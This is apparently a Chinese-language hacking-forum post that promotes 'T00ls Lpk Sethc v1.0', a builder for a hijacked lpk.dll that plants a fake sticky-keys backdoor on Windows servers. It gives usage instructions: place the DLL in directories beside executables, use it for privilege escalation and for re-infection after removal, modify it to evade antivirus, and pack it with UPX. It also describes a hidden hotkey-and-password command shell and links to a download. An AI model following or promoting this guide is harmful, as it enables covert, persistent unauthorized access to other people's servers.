什么是lpk:
就是一系統dll,位于system32目錄下,特點是每個可執行文件運行之前都要加載此dll
而windows系統特性是先判斷文件目錄是否存在此dll再判斷system32目錄
由此基于lpk的dll劫持就產生了,本工具只是利用這一特性而擴展編寫的!

=======================以上為lpk.dll的一些說明=======================

話不多說上圖:

特別說明:

1.說下特點吧,生成出來以后是lpk.dll
將此文件放在服務器任何有exe的目錄,比如serv-u,mysql等安裝目錄
然后運行目錄下的任何exe,后門就已經自動替換好了~

2.當然也可以當作輔助提權所用,有可寫目錄的話都可以網目錄里面傳下!
這樣當管理下次運行此目錄下的可執行文件以后,后門也就產生了!同理,就算管理刪了你的后門但是你的dll還在,那么管理一運行,就又替換了

3.昨天才寫完所以有點粗糙,很多功能也不完善,暫時只支持3個熱鍵呼出,相信熱鍵多了你自己也按不過來 = =!
而這里要填熱鍵代碼,壓縮包里面我會把熱鍵代碼表打包,你要設置哪3個熱鍵,
只需要在txt里面找到那個鍵對應的值,然后填寫到上圖的3個編輯框中!

4.熱鍵呼出后當然就是密碼了,密碼最終是采用的32位md5,只要你密碼設置的夠難
別人通過system32下載了你的后門也是無濟于事!

5.生成器目錄下的LPK.DAT即是主文件,可以直接對其進行免殺修改等處理!

6.建議生成時候選上upx壓縮,這樣出來體積50kb,還沒有一個shell大!當然你也可以加別的保護工具!

7.本程序適用于 2K/3K/XP  2008沒有測試,有興趣的可以測試下! win7/vista系統已經不支持劫持lpk,但是可以通過修改注冊表達到,但是這樣就沒有什么意義了!

8.重點說明下,呼出后門的時候3個熱鍵一定要同時按下!比如我設置了A+B+C鍵呼出,必須ABC同時按,而不是先按下A再按下B這樣
由于本程序并非采用注冊熱鍵!而是采用的監控鍵按下的狀態,優點是可以任意支配熱鍵,整個鍵盤你想怎么搭配熱鍵就怎么搭建
缺點如上呼出的時候必須同時按下!

=======================以上為生成以及呼出的一些說明 =======================

后門界面:

除了左上角多了個白框,其他地方是100%的高仿..由于粘滯鍵自身的窗口樣式實在特殊
查了很多資料很多方法都不能模仿完美!

密碼界面:

功能界面:

輸入要執行的命令直接”RUN”運行,下面會有回顯

執行命令:

考慮到某些服務器無法執行cmd命令或者一些其他的原因,所以添加一個功能”直搗黃龍”,按下直接開桌面,再按一下即可隱藏winlogo登陸界面!
想方便的用這個功能也不錯!

=======================以上為功能界面的一些說明 =======================

最后還要說下,本程序缺陷之1就是熱鍵,必須同時按下,所以如果發現無法呼出,請多按幾次!

當前版本:v1.0
lpk.dll大小(171kb)
lpk.dll使用upx壓縮后大小(59kb)

下載地址:

http://b.hkrices.com/T00ls Lpk Sethc v1.0.rar

 

T00ls Lpk Sethc測試使用視頻,http://hkrices.com/lpk.html